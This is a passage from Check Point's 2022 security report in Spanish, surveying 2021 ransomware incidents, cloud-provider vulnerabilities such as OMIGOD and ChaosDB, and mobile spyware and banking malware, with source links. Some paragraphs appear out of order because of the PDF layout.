EL APROVECHAMIENTO DE LOS CIBERATAQUES No es ningún secreto que un ciberataque, ya sea dirigido o ampliamente distribuido, puede tener un impacto dramático en el rendimiento organizacional, la integridad de los datos, el éxito del cliente, la reputación a largo plazo y, por supuesto, las finanzas. Obviamente, los ataques que se dirigen a la infraestructura crítica pueden paralizar una rutina de organización como así también su entera cadena de suministro. En 2021, presenciamos una gran cantidad inusual de ataques que provocaron interrupciones en la vida cotidiana de las personas y, en algunos casos, incluso amenazaron su sentido de seguridad física. Ya sea que estén conducidos por intereses financieros o ideológicos, los agentes de amenaza están buscando constantemente aprovecharse más con nuevas maneras de incrementar la presión puesta en sus víctimas.

C A P Í T U L O 3

Como se describió en nuestro informe de mitad de año, los incidentes de los ciberataques están incrementándose en todo el panel a medida que los agentes de amenaza aprovechan las circunstancias cambiantes y los esfuerzos precipitados de la transformación digital. Según este informe, los ciberataques están por sobre el 50% del promedio cuando se comparan con los datos del año pasado, pero los sectores de educación e investigación parecen haber sufrido el impacto más grande, presentando un promedio de 1605 ataques semanales”.

18CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 18CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

la producción mientras la Casa Blanca asignó al FBI para que investigue. En Australia, algunos mataderos fueron completamente apagados, forzando a la compañía a darle licencia a 7000 empleados. Eventualmente, con el temor por el precio de la inflación combinado con el desempleo masivo, el CEO de JBS USA, una subsidiaria de JBS S.A., anunció que la compañía pagó un rescate a los criminales equivalente a USD 11 millones en BTC.

El sector de la educación también fue profundamente impactado. En 2021, fue el sector más atacado globalmente, con un incremento del 75% en comparación con 2020 y un promedio de casi 1605 intentos de ataques semanales por organización. La interrupción que sufrieron las instituciones educativas impactaron a los estudiantes, profesores y otros miembros del personal. Howard University en Washington D.C. cayó víctima de un ataque de ransomware en Septiembre y fue obligada a suspender las clases para realizar una investigación exhaustiva de su red junto con una auditoría de los dispositivos de los estudiantes y del personal. De manera similar, el Lewis and Clark Community College, en Illinois, fue alcanzado por un ataque de ransomware en Noviembre, que afectó su plataforma de aprendizaje en línea y otros sistemas fundamentales. Tuvieron que cerrar todos sus campus y cancelar las actividades extracurriculares, incluidos los eventos deportivos que se realizaban en sus instalaciones. El FBI lanzó una alerta contra el ransomware PYSA que se dirigía a las instituciones de educación superior en Estados

Unidos y el Reino Unido.

Uno de los ataques más significativos, que demuestra a la perfección lo anterior, es el incidente de ransomware que tuvo lugar en Mayo. La operación se dirigió a la compañía de combustible Colonial Pipeline, que provee combustible a la costa sudeste de los Estados Unidos. El incidente forzó a la compañía a cerrar sus operaciones, incrementando los precios de la gasolina y ocasionando una mayor disminución en el suministro principal de la costa este. Esta cadena de eventos eventualmente generó el pánico inmediato al comprar en tantas estaciones de servicio que se quedaron completamente sin combustible. Los oficiales del gobierno solicitaron a la población no precipitarse a las estaciones de gas considerando que la gente estaba, de hecho, intentando llenar con gasolina recipientes de plástico para evitar el desabastecimiento. Un día después de que aconteciera el ataque, Colonial Pipeline no más opción que pagar el rescate de USD 5 millones al grupo delictivo de ransomware DarkSide que llevó a cabo el ataque a fin de desbloquear sus sistemas.

El mismo mes, JBS S.A., la compañía de procesamiento de carne más grande del mundo, fue víctima de un ataque perpetrado por el grupo de ransomware REvil. La compañía de Brasil distribuye productos de carne realizados en 150 plantas industriales a través de 15 países y tiene, aproximadamente, 150 000 empleados en todo el mundo. El ataque que impactó en la red de la compañía de mataderos y los suministros de carne en Estados Unidos, Canadá y Australia y ocasionó que se tuvieran cancelar turnos de 3000 trabajadores. Todas sus plantas de carne de Estados Unidos y las instalaciones de empaquetado de carne, responsable por casi un cuarto de los suministros de carne en América, se suspendió

C A P Í T U L O 3

https://www.reuters.com/technology/jbs-paid-11-mln-response-ransomware-attack-2021-06-09/ https://blog.checkpoint.com/2021/10/06/as-battle-against-cybercrime-continues-during-cybersecurity-awareness-month-check-point-research-reports-40-increase-in-cyberattacks/ https://www.washingtonpost.com/education/2021/09/08/howard-university-ransomware-cyberattack/ https://www.thetelegraph.com/news/article/Lewis-Clark-remains-offline-after-cyber-attack-16657042.php https://www.cisa.gov/sites/default/files/publications/PYSA Flash.pdf https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/ https://www.nytimes.com/2021/05/08/us/politics/cyberattack-colonial-pipeline.html https://www.usatoday.com/story/news/nation/2021/05/12/colonial-pipeline-cyberattack-anxiety-gasoline-panic-buying/5059184001/ https://gov.georgia.gov/press-releases/2021-05-11/gov-kemp-signs-executive-order-temporarily-suspend-gas-tax-georgia https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html https://www.bbc.com/news/world-us-canada-57318965 https://www.newsweek.com/russia-linked-cyber-attack-jbs-meats-hits-7000-jobs-1596713 https://www.bloomberg.com/news/articles/2021-05-31/meat-is-latest-cyber-victim-as-hackers-hit-top-supplier-jbs

19CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 19CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

computadoras y algo de la infraestructura del hospital, haciendo que la descarga y el procesamiento de los pacientes sea imposible debido a la imposibilidad de recuperar los archivos del paciente y registrar otros nuevos. En Diciembre, el Behavioral Health Group (BHG), que mantiene casi 80 clínicas de tratamiento con opiáceos en Estados Unidos, sufrió un ciberataque que interrumpió su red durante una semana. En algunos centros, los pacientes fueron avisados de tener su dosis para el hogar de medicina prescrita a fin de tratar la adición a los narcóticos, ya que las computadoras no estaban disponibles para imprimir las etiquetas de prescripción, dañando potencialmente su tratamiento sensible contra la adicción.

Los hackers orientados por una ideología también se han arreglado para ocasionar una interrupción pública, particularmente en Irán. En primer lugar, la infraestructura de los ferrocarriles iraníes enfrentó de nuevo un ciberataque en Julio en el cual los hackers mostraron mensajes sobre demoras o cancelaciones de los trenes en los tableros de información de las estaciones de todo el país, solicitando a los pasajeros que llaman a un número (que pertenecía a la oficina del líder supremo iraní Ayatollah Khamenei) para obtener más información. El ataque interrumpió de manera grave las operaciones de trenes el mismo día y propagó el miedo

y la confusión entre el público. Check Point

Research investigó y atribuyó el ataque al grupo

Indra que se opone al régimen y ha estado

activo desde al menos 2019, conocido por su

uso de malware limpiador.

Por último, a mediados de 2021, el ransomware Grief atacó muchos distritos escolares en los Estados Unidos, entre ellos, un distrito escolar en Misisipi. El ransomware robó 10 GB de datos incluidos información personal y profesional y ha amenazado con publicar los datos a menos que se le pague. Las instituciones de aprendizaje superior, como universidades e institutos, son un buen objetivo para los cibercriminales porque sus sistemas, que permiten a los estudiantes y facultades conectarse con sus dispositivos personales a la red de la institución, no están completamente protegidos.

El sector de atención médica también ha sido fuertemente atacado por los cibercriminales desde el inicio de la pandemia y, al igual que los hospitales, las instalaciones de investigación implicadas en el desarrollo de vacunas y las compañías farmacéuticas, todas demuestran ser un objetivo tentador debido al carácter urgente de su trabajo. En Octubre, un devastador ataque de ransomware tuvo lugar frente al sistema de atención médica de Newfoundland y Labrador, Canadá. Como resultado, se robaron datos del paciente y el empleado y los sistemas clave se interrumpieron durante más de una semana, ocasionando la demora en miles de citas, incluyendo la quimioterapia, ya que casi todos los servicios y operaciones que no eran de emergencia fueron cancelados dentro de la provincia. El mismo mes, presenciamos uno de los primeros ataques de ransomware contra el hospital en Medio Oriente, como el grupo chino DeepBlueMagic que atacó el Hillel Yaffe Medical Center en Hadera, Israel, con un ransomware personalizado. El ataque incapacitó las

C A P Í T U L O 3

https://www.bleepingcomputer.com/news/security/cyberattack-on-bhg-opioid-treatment-network-disrupts-patient-care/ https://www.nytimes.com/2021/08/14/world/middleeast/iran-trains-cyberattack.html https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/ https://mississippitoday.org/2021/06/11/school-district-ransomware-attack-mississippi/ https://blog.checkpoint.com/2021/01/05/attacks-targeting-healthcare-organizations-spike-globally-as-covid-19-cases-rise-again/ https://www.cbc.ca/news/canada/newfoundland-labrador/nl-cyber-attack-worst-canada-1.6236210 https://www.ynetnews.com/business/article/bjc1ddesk

20CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 20CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

En Octubre, un ciberataque masivo interrumpió 4300 estaciones de servicio iraní, teniendo como objetivo los sistemas de tarjetas electrónicas que permitían a las personas comprar gasolina con los subsidios del gobierno. En la pantalla, los consumidores que intentaron llenar su tanque advirtieron que encontraron el aviso “ciberataque 64411”, del número de teléfono del líder supremo de Irán (el mismo que se expuso en el ataque del tren). El incidente ocasionó un gran negocio de desorden con grandes filas de personas en las estaciones de servicio temiendo por la escasez y el incremento repentino del precio.

Todos los ataques descriptos anteriormente han tenido un impacto substancial en un sector y región como objetivo particular. También han obtenido mucha atención de los medios, que naturalmente participa directamente a manos de los cibercriminales en su intento por sembrar miedo y obtener un provecho sobre sus víctimas. Desafortunadamente, como ha demostrado el 2021, los ciberataques a menudo tienen un efecto mucho más amplio en la población general de lo que habían previsto

originalmente los atacantes.

C A P Í T U L O 3

https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/

21CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 21CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

I TA I G R E E N B E R G Vicepresidente,

Gestión del producto

SERVICIOS EN LA NUBE BAJO ATAQUE En 2020, la pandemia global condujo a cambios significativos al entorno del trabajo corporativo como así también a la arquitectura corporativa de red. Dentro de esos cambios, tanto la conmutación de la arquitectura basada en la nube –creada para abordar la necesidad de redes híbridas y gestionadas de manera remota– como la preferencia por los proveedores como servicio por sobre los tradicionales, se han realmente destacado en términos de escala de adopción. Por consiguiente, en 2021, también se puso de manifiesto que los entornos en la nube también estaban creciendo en popularidad entre los usuarios finales. A mediados de año, Gartner ha lanzado su pronóstico indicando una estimación de crecimiento del gasto en servicios públicos en la nube del usuario final del 23% para 2021. Esto significa más de USD 332 mil millones en comparación con los USD 270 mil millones de 2020 y los USD 242,7 mil millones de 2019. Las empresas ahora están destinando fondos a gran escala para arquitecturas en múltiples nubes Microsoft Azure y AWS, como las más conocidos, y Google Cloud Platform, IBM, VMWare y otros que dominan una fracción considerable del mercado.

C A P Í T U L O 3

Es comprensible que los negocios estén incrementando su dependencia en la nube, particularmente a medida que nos movemos al “nuevo normal” pospandemia, donde el trabajo híbrido jugará un rol clave para muchos sectores. Sin embargo, cambiar la productividad en la nube también significa que los negocios están confiando cada vez más en los proveedores para gestionar sus bases de datos, códigos de propietario y recursos organizacionales, muchos de ellos con brechas de conocimiento interno en las que ahora trabajamos arduamente en llenar. Cubrir esas brechas debería ser el principal objetivo para las empresas en 2022, ayudándolas a aprovechar su relación con los proveedores en la nube en su máximo potencial en términos de seguridad, conformidad y riesgo”.

https://www.gartner.com/en/newsroom/press-releases/2021-04-21-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-grow-23-percent-in-2021 https://www.zdnet.com/article/the-top-cloud-providers-of-2021-aws-microsoft-azure-google-cloud-hybrid-saas/

22CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 22CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Obviamente, las organizaciones se están volviendo cada vez más dependientes de los proveedores en la nube para gestionar de manera segura sus bases de datos, códigos de propietario y recursos organizacionales. Estas organizaciones ahora están gradualmente llenando la plataforma y las brechas de conocimiento en la gestión del rol, formadas durante el cambio repentino a entornos basados en la nube en 2020, hacia una mejor seguridad y una administración más integral. Los ataquesa la asunción de rol Administración de identidades y acceso (Identity and Access Management, LIAM), destinadas a elevar los privilegios después de obtener acceso sin autorización, sin embargo, continúa siendo una preocupación considerable.

Como es usual, los actores de amenaza continúan compitiendo con la comunidad de investigación en seguridad, buscando nuevas vulnerabilidades y aprovechamiento. Desde fines de 2021, hemos presenciado una ola de ataques que aprovechan las fallas en los servicios de los proveedores de servicio líderes en la industria para obtener control sobre una infraestructura en la nube de la organización o, potencialmente, toda la base de datos de la organización que almacena información del propietario, el cliente y financiera. Las fallas en discusión nos son fallas de lógicas de confianza, las fallas basadas en permiso que derivan de la política del rol de la organización se usan por los agentes de amenaza para escalar gradualmente los privilegios dentro del entorno. En su lugar, estamos lidiando con vulnerabilidades críticas en la misma infraestructura en la nube , que puede permitir el control completo de las cuentas o la ejecución de código arbitrario.

La tendencia es seguida por los conocidos ataques de falla OMIGOD. En Septiembre, los investigadores encontraron cuatro vulnerabilidades críticas en la infraestructura de gestión abierta (Open Management Infrastructure, OMI), uno de los agentes de software de Microsoft Azure que permite que los usuarios gestionen configuraciones en entornos remotos y locales. OMI se implementa en las máquinas virtuales de Azure Linux integradas a múltiples servicios de Azure y se implementa de manera automática cuando algunos servicios están habilitados, aumentando la lo que hace que estas fallas tengan alta probabilidad de vulnerarse. Se estima que el 65% de todos los clientes de Azure son vulnerables, lo que significa miles de organizaciones y millones de dispositivos de extremo. Las fallas de OMIGOD son fáciles de aprovechar, ya que solo se necesita una simple solicitud sin el encabezado de autenticación. En conjunto, las vulnerabilidades pueden permitir que los agentes ejecuten un código arbitrario remoto dentro de una red vulnerable y escalar para obtener privilegios de raíz.

Microsoft ya emitió un parche para abordar las fallas como parte de su lanzamiento en Septiembre de 2021. Sin embargo, algunos investigadores advirtieron que el arreglo automático de la compañía no fue efectivo por muchos días, hasta que se reparó. Los ataques al aprovechar estas fallas, en particular la falla clasificada como 9,8 y denominada CVE-2021-38647, ya se habían observado al mismo tiempo que la exposición y han tenido un incremento rápido desde entonces. Los servidores que escaneaban en busca de dispositivos vulnerables repuntaban alrededor de 10 a más de 100 solo durante el fin de

C A P Í T U L O 3

https://blog.checkpoint.com/2021/05/05/check-your-privilege-the-risks-of-privilege-escalation-in-the-cloud/ https://www.praetorian.com/blog/aws-iam-assume-role-vulnerabilities/ https://blog.checkpoint.com/2021/05/05/check-your-privilege-the-risks-of-privilege-escalation-in-the-cloud/ https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 https://www.securityweek.com/attacks-targeting-omigod-vulnerability-ramping https://twitter.com/andrew___morris/status/1438598477718622214

23CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 23CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

de la misma nube pública. Esto significa que un usuario malicioso de Azure Container Instances (ACI) podría potencialmente ejecutar un código arbitrario en otros clústeres de Kubernetes de los clientes. La vulnerabilidad de la falla consiste en tres etapas, comenzando con el escape del contenedor, que es una técnica de escala de privilegio para los entornos del contenedor. Azurescape permite que un atacante obtenga los privilegios administrativos sobre el clúster entero de contenedores. Afortunadamente, se lanzó un parche de inmediato cuando se descubrió por primera vez la falla, pero se necesitaronmás acciones por parte de los usuarios de ACI. A fines de 2021, no se detectaron explotaciones. Sin embargo, la falla ha creado consciencia sobre los peligros que provocan los entornos en la nube de multiempresa, las infraestructuras comunes a gran escala que alojan muchas organizaciones en una sola plataforma.

Microsoft Azure no es el único servicio cuyos fallos de seguridad se descubrieron el año pasado. En Junio, los investigadores descubrieron una vulnerabilidad en Google Compute Engine (GCE), un componente de infraestructura como servicio (IaaS) de Google Cloud Platform que se usa para crear y lanzar máquinas virtuales a pedido. La falla permite que el atacante tome el control virtual de las máquinas debido a una combinación de factores, incluido el uso de números aleatorios débiles por el software de ISC DHCP. La vulneración de la falla, alcanzada por la suplantación del servidor de metadatos desde el punto de vista de la máquina virtual de objetivo, podría permitir que los agentes eventualmente inicien sesión como usuario raíz en la máquina virtual. Google emitió un parte para la falla casi un año después de que fuera descubierta.

semana. Mirai, el botnet conocido de la IoT (Internet de las Cosas) fue uno de los primeros en dirigirse a los dispositivos vulnerables y el malware intentó cerrar el puerto 5896 (el puerto de SSL de la OMI) para mantener otros agentes aprovechándose del ataque. También se observaron ataques dirigidos a implementar criptomineros en los dispositivos sin revisiones de Linux.

Otra falla alarmante en Microsoft Azure se descubrió el mes anterior, en Agosto. Esta vez, la vulnerabilidad, apodada ‘ChaosDB’, se encontró en Azure Cosmos DB, una base de datos NoSQL de modelo múltiple usada por algunas de las más importantes empresas en el mercado como Coca Cola, Skype y Symantec, para gestionar bases de datos a gran escala, incluyendo información de transacciones financieras. La falla permite que un agente recupere muchas claves internas que se usan para obtener privilegios de raíz y, eventualmente, permiten manejar las bases de datos y las cuentas de la organización. En pocas palabras, mediante el aprovechamiento de esta falla, los atacantes obtuvieron control completo y sin restricciones de los recursos de la nube entera de todos los clientes de Azure Cosmos DB.

Incluso otra brecha en Microsoft Azure se descubrió hacia el final del año. La falla, denominada ‘Azurescape’, afecta a la plataforma de contenedor como servicio de Azure que depende de una vulnerabilidad de dos años designada CVE-2019-5736 en RunC, un tiempo de ejecución del contenedor. Únicamente, Azurescape es una vulnerabilidad entre cuentas: permite que un atacante interrumpa el entorno de infracción y la ejecución del código en los entornos que pertenecen a los demás usuarios en el servicio

C A P Í T U L O 3

https://threatpost.com/azurescape-kubernetes-attack-container-cloud-compromise/169319/ https://thehackernews.com/2021/06/unpatched-virtual-machine-takeover-bug.html https://github.com/irsl/gcp-dhcp-takeover-code-exec https://www.securityweek.com/google-working-patching-gcp-vulnerability-allows-vm-takeover https://twitter.com/GossiTheDog/status/1438832601221976065 https://therecord.media/ddos-botnets-cryptominers-target-azure-systems-after-omigod-exploit-goes-public/ https://www.wiz.io/blog/chaosdb-how-we-hacked-thousands-of-azure-customers-databases https://gotcosmos.com/about/customers https://www.wiz.io/blog/chaosdb-explained-azures-cosmos-db-vulnerability-walkthrough https://unit42.paloaltonetworks.com/azure-container-instances/ https://msrc-blog.microsoft.com/2021/09/08/coordinated-disclosure-of-vulnerability-in-azure-container-instances-service/ https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/ https://www.paloaltonetworks.com/blog/2021/09/azurescape/

24CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 24CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

FPO

Una investigación reciente también brinda una revisión en profundidad de una técnica denominada contrabando de solicitudes de HTTP y su potencial uso para atacar la API Gateway de AWS y AWS Cognito, un proveedor de autenticación. La investigación demuestra cómo se puede aprovechar esta técnica por las restricciones de omisión y alcanzar la contaminación del caché.

Por último, a fines de 2021, los investigadores advirtieron un cambio peculiar en los servicios de AWS que permitirían que los servicios de soporte de AWS leyeran los datos del cubo de S3 del cliente, en lugar de solo observar sus metadatos. Esta falla potencial de privacidad se hizo posible mediante un cambio en los permisos de un rol obligatorio denominado “AWSServiceRoleForSupport” creado para permitir el soporte técnico y administrativo. Eventualmente, el cambio se revirtió y AWS manifestó que implementarían protecciones adicionales para prevenir esos errores en las configuraciones en el futuro.

Para concluir, en 2021 las vulnerabilidades del proveedor en la nube se volvieron mucho más alarmantes que antes. Las vulnerabilidades expuestas durante el año han permitido que los atacantes, durante lapsos de longitud variable, ejecuten códigos arbitrarios, escalen privilegios de raíz, accedan a cantidades masivas de contenido privado e, incluso, entre diferentes entornos. En síntesis, las vulnerabilidades en la misma infraestructura en la nube se han expuesto que hasta los más vigilantes y profesionales consumidores en la nube no han previsto ni prevenido.

C A P Í T U L O 3

https://www.intruder.io/research/practical-http-header-smuggling https://twitter.com/QuinnyPig/status/1473705669517791253 https://aws.amazon.com/security/security-bulletins/AWS-2021-007/

25CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 25CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Debemos abordar primero los desarrollos en torno a Pegasus de NSO, una de las más notorias familias de malware. Pegasus es un spyware móvil capaz de infectar tanto dispositivos iOS como Android, y fue desarrollado y comercializado por el grupo NSO que se encuentra en Israel. El spyware puede obtener el control total de un dispositivo móvil y recopila muchos tipos de datos como mensajes, fotos, calendarios, correos electrónicos y más. Además, el malware es capaz de activar la cámara, recopilar imágenes y registrar las conversaciones circundantes. La infección de Pegasus se basa en un aprovechamiento sin clics. A pesar que el malware se descubrió por primera vez en 2016, en 2019 se reveló que el spyware aprovechó el servicio de WhatsApp para infectar a más de 1400 usuarios, los objetivos de múltiples clientes de NSO.

En Julio de 2021, una vasta recopilación de canales de noticias informó que la herramienta se había usado para obtener acceso a los dispositivos móviles de oficiales del gobierno, periodistas, activistas de derechos humanos y ejecutivos comerciales en todo el mundo. La

DESARROLLOS EN EL ÁMBITO DE LA MOVILIDAD Durante 2021, los agentes de amenaza gradualmente incrementaron su enfoque en los dispositivos móviles, tanto para las campañas a gran escala del usuario final y los ataques empresariales dirigidos. Un estudio basado en una encuesta reveló que la implementación de la política ‘BYOD’ (Bring-Your-Own-Device) en el lugar de trabajo, en donde los empleados reemplazan los dispositivos corporativos designados con sus propios dispositivos personales, tomó por sorpresa a las organizaciones, con aproximadamente el 49% de las organizaciones encuestadas indicando que no son capaces de detectar un ataque o un incidente en los dispositivos que son propiedad de los empleados.

lista contiene alrededor de 50 000 víctimas potenciales de Pegasus que fueron filtradas y obtuvieron los titulares, posiblemente arrojando luz sobre los clientes de NSO. La atención de los medios condujo a una amplia investigación en un esfuerzo por descubrir los métodos de infección de Pegasus y ayudar a los usuarios a detectar Pegasus en sus dispositivos. Eventualmente, en Septiembre, Apple emitió parches para dos vulnerabilidades del día cero en un iMessage aprovechado por Pegasus, designado como CVE-2021-30860 y CVE-2021-30858. Estas fallas vulneran iPhones y Macs al permitir que documentos maliciosos ejecuten los comandos. En Noviembre, Apple presentó una demanda contra NSO por usar software de hackeo en los dispositivos Apple y robar datos privados. Naturalmente, los agentes de amenaza rápidamente diseñaron una estafa de extorsión basada en el escándalo. Una campaña reciente aprovecha el miedo público del spyware de iOS Pegasus, buscando intimidar a las víctimas potenciales que propagan correos electrónicos que contienen exigencias de rescate y reclaman tener videos privados de las víctimas, alegando que fueron tomados por el malware Pegasus.

C A P Í T U L O 3

https://www.theguardian.com/news/2021/jul/18/what-is-pegasus-spyware-and-how-does-it-hack-phones https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html https://www.theguardian.com/world/2020/apr/29/whatsapp-israeli-firm-deeply-involved-in-hacking-our-users https://techcrunch.com/2021/07/19/toolkit-nso-pegasus-iphone-android/ https://www.bloomberg.com/press-releases/2021-06-15/bitglass-study-finds-security-gaps-continue-to-be-pervasive-across-bring-your-own-device-byod-initiatives https://forbiddenstories.org/case/the-pegasus-project/ https://www.siliconrepublic.com/enterprise/pegasus-spyware-is-my-phone-infected https://www.helpnetsecurity.com/2021/09/14/cve-2021-30860/ https://www.cnet.com/tech/mobile/apple-sues-pegasus-spyware-developer-what-you-need-to-know/ https://www.bleepingcomputer.com/news/security/pegasus-iphone-hacks-used-as-lure-in-extortion-scheme/

26CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 26CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Pegasus se destaca debido a su proceso continuo de infección sin clic, la lista de víctima controversial y las características de exfiltración sofisticada de datos. Por lo tanto, no es sorprendente que ya no sea el único de su tipo. Hacia el final del año, los investigadores descubrieron un agente más de amenaza en la arena de spyware móvil del sector privado. Cytrox, una compañía ubicada en Macedonia del Norte, comercializa un spyware denominado Predator para los dispositivos iPhone que infecta los objetivos del cliente mediante enlaces de un solo clic que se envían por WhatsApp. A medida que se muestra cada vez más la información sobre el malware, hay más oportunidades de que estas sean adoptadas por agentes y grupos comunes de amenaza. Además, la amplia distribución del spyware móvil y la atención que ha captado este campo en 2021 son todavía más indicaciones del rol crucial que los dispositivos móviles juegan en el panorama de las amenazas cibernéticas.

Durante todo el año, observamos agentes de amenaza invertir esfuerzos substanciales en hackear las cuentas de los más importantes medios sociales como Facebook y Telegram. Estos esfuerzos incluyeron la ejecución de campañas de ataque a gran escala con el objetivo de tener acceso a los dispositivos móviles. En Agosto, se descubrió que un nuevo troyano de Android llamado ‘FlyTrap’ había afectado a casi 10 000 cuentas de Facebook en 144 países desde Marzo de 2021, principalmente, mediante aplicaciones maliciosas disponibles en Google Play Store. Las aplicaciones se cargaron y rápidamente eliminaron de la plataforma pero después estuvieron disponibles en las tiendas de aplicaciones de terceros. Los atacantes también aprovecharon WhatsApp para distribuir una versión modificada de la aplicación para que los

dispositivos Android instalen el troyano “Triada”. En Octubre, los investigadores encontraron una aplicación de edición de fotos que se ofrecía en Google Play Store y contenía un código maliciosos que recopilaba las credenciales de los usuarios de Facebook y las usaba para ejecutar campañas de publicidad con la información paga de la víctima. Miles de usuarios descargaron la aplicación. Finalmente, en Noviembre, un nuevo malware de Android llamado ‘MasterFred’ aumentó su prominencia debido a su uso de capas de inicio de sesión falsas para robar información de la tarjeta de crédito de los usuarios de Netflix, Instagram y Twitter.

Otro vector significativo de ataque que fue importante en 2021 yace en los mensajes de SMS para la distribución de malware. SMiShing, la abreviatura de suplantación de identidad (phishing) para SMS, es una técnica de phishing que depende de los dispositivos móviles para la distribución de ingeniería social y usa mensajes de SMS como vector de ataque. El botnet de Android FluBot Android, que depende de esta técnica, continuó sus actividades en Abril de 2021 pese a los arrestos indicados por la policía española. En Septiembre, el botnet agregó a su arsenal un nuevo método para afectar los dispositivos de Android y comenzó a propagar un mensaje falso de actualización, advirtiendo de una infección de Flubot. La infección se propaga cuando la víctima hace clic en el botón “instalar actualización de seguridad”. FluBot apareció de nuevo en Noviembre en una campaña dirigida a los usuarios finlandeses. Después de que el vector de ataque demostró su eficiencia en las campañas de Flubot, SMiShing ha sido gradualmente adoptado por agentes con pocas habilidades. Por ejemplo, una investigación reciente realizada por Check Point Research indicó que los ataques de

C A P Í T U L O 3

https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/ https://blog.zimperium.com/flytrap-android-malware-compromises-thousands-of-facebook-accounts/ https://securityaffairs.co/wordpress/121434/mobile-2/modified-android-whatsapp-triada-trojan.html https://www.bleepingcomputer.com/news/security/photo-editor-android-app-still-sitting-on-google-play-store-is-malware/ https://www.bleepingcomputer.com/news/security/new-android-malware-targets-netflix-instagram-and-twitter-users/ https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/ https://www.kyberturvallisuuskeskus.fi/en/be-aware-malware-spread-sms https://research.checkpoint.com/2021/smishing-botnets-going-viral-in-iran/

27CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 27CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

SMiShing fueron muy efectivos en Irán, más allá de la poca calidad general de los conjuntos de herramientas de los actores. Estas campañas utilizan SMiShing mientras también suplantan las entidades claves como el gobierno iraní, el sistema judicial, los portales de compra y más. Muchos avisos sobre esto ahora recuperan métodos de ataque que aparecieron en los canales de noticias. La escala de la reciente ola de ataque no tiene precedentes y es esperable si se considera el floreciente mercado de botnet como servicio que tiene lugar en los foros ilegales y los canales de Telegram. Los kits de suplantación de identidad (phishing) están disponibles a precios que rondan desde los USD 50 a los USD 100. Estimamos que campañas similares, también inspiradas en el uso exitoso de SMiShin por parte de FluBot podrían aparecer pronto también los demás países.

“UltimaSMS”, otra amplia estafa en torno a mensajes rotativos que tuvo lugar en 2021, es una campaña masiva que utiliza casi 150 aplicaciones. Con más de 10 millones de descargas desde Google Play Store, su truco es para atraer las víctimas en los servicios de suscripción prémium de SMS sin su conocimiento.

Finalmente, los cambios sistemáticos ocasionados por la pandemia global también están afectando al campo del malware de la banca móvil. La expansiva digitación del sector bancario en 2021 condujo a la búsqueda de numerosas aplicaciones diseñadas para limitar las interacciones fuera de línea que, a su vez, habían generado la distribución de nuevas amenazas. En Septiembre, Check Point Research descubrió un nuevo método de ataque contra los usuarios de Android que abusan de los servicios de accesibilidad del dispositivo. El ataque dirigido a los usuarios de PIX, una solución de pago al instante de solo un año pero, aun así, bastante conocida y creada y gestionada por el Banco Central de Brasil. La campaña presentó dos variantes de malware bancario distribuido por dos aplicaciones maliciosas en Google Play Store. El más exclusivo, denominado PixStealer, abusó de los servicios de accesibilidad de Android (Android’s Accessibility Services, AAS) para robar dinero de un banco específico mediante transacciones PIX. Esta minimalista pero innovadora combinación de funciones permite que el malware recopile fondos sin interactuar con un C&C, ayudándolo a permanecer no detectado. Debido a su simplicidad y eficiencia, podemos esperar que los demás agentes de amenazan sigan su camino.

C A P Í T U L O 3

https://www.iribnews.ir/fa/news/3181066/%DA%A9%D9%84%D8%A7%D9%87%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C-%D8%A7%D8%B2-%D8%B7%D8%B1%DB%8C%D9%82-%D8%A7%D8%B1%D8%B3%D8%A7%D9%84-%D9%BE%DB%8C%D8%A7%D9%85%DA%A9-%D8%AC%D8%B9%D9%84%DB%8C-%D8%A8%D8%A7-%D9%86%D8%A7%D9%85-%D8%B3%D8%A7%D9%85%D8%A7%D9%86%D9%87-%D8%AB%D9%86%D8%A7 https://blog.avast.com/premium-sms-scam-apps-on-play-store-avast https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/

28CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 28CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

